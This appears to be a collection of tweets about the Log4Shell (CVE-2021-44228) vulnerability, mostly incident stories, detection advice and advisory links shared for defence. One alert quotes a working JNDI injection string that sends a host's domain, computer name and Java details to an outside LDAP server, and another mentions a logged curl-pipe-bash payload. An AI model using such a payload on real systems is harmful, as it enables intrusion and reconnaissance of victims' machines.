-
A DFIR friend told me that one of his customers, which spent a full week finding & remediating log4j vulnerabilities, got ransomed through an unpatched Confluence vulnerability that was published in August
#Log4j #Log4Shell pic.twitter.com/ATINukuFCz -
If you have LDAP servers inside your network, or trust external 3rd-party ones, and either of them allow the schema attributes javaClassName, javaCodeBase or javaSerializedObject as writable, you should be making sure attackers aren't using them for
#Log4j #Log4Shell pic.twitter.com/hDAPLJq7qI -
New Alert Ongoing distributed scanning targeting
#VMware instances vulnerable to #Log4Shell (2nd round) ${jndi:ldap://149.28.240.17:443/3927f9a2a513d2b1c4da803f15e6de48_:;_${env:USERDOMAIN}_:;_${env:COMPUTERNAME}_:;_${java:os}_:;_${sys:java.version}} Domain recon pic.twitter.com/AdxRnNAs32 -
v6.0 of the "Am I vulnerable to
#Log4Shell decision tree. Also pushed the XML files on my github : https://github.com/DickReverse/InfosecMindmaps/tree/main/Log4shell … Don't hesitate to interact and propose updates. pic.twitter.com/Rwv67NNkxH -
The kind of exploitation attempt I get in my
#nginx logs. The decoded #base64 does a curl | bash, in short a classic... IP blocked, protect yourselves (update) #Log4Shell pic.twitter.com/uRd6ttHqbv -
We are just a quick second away from abrupt chaos until all the
#Log4Shell #Log4j systems are patched. pic.twitter.com/pxfwYCDekG -
When relying on open source tools for detection of vulnerable
#Log4j components: 1. Make sure you use the most up to date version of the tool 2. Be mindful of the fact that not all edge cases are covered More on that here: https://www.zdnet.com/article/multiple-log4j-scanners-released-by-cisa-crowdstrike-more/ … #Log4Shell pic.twitter.com/ChNVmn58jR -
Well everyone, I'm finally out of Omicron quarantine. Studio was shut down for weeks. Anyway, hope you had a lovely Christmas!
#Log4Shell #log4j #sysadmin pic.twitter.com/mIMO1xawN0 -
Search for
#Log4Shell IPs in your network https://j.mp/30XnVtB pic.twitter.com/6Fg3zCyebM -
Updated log4j diagram for Java 6! http://secu.si/2021/12/log4shell/ … CVE-2021-44228
#Log4Shell #ApacheLog4j #log4j2 pic.twitter.com/ObkK7bOu6c -
#Log4Shell is a vulnerable Apache library, a window permanently open to #cybercrime. https://buff.ly/3pDSeih pic.twitter.com/qqBPZ9LH0C -
The
#Log4Shell flaw worries #cybersecurity experts. It affects an open-access code module used in many software products. @CybelAngel explains https://bit.ly/Log4Shell-les-dangers-de-la-faille …. – read it on @ByMaddyness. #log4j #Log4Shell #secops #CISO pic.twitter.com/FDKovLKa8c -
@CERT_FR looks back at the significant vulnerabilities of the week, and #Log4Shell is not alone. https://www.cert.ssi.gouv.fr/actualite/CERTFR-2021-ACT-053/ … pic.twitter.com/J7XW8WyBv6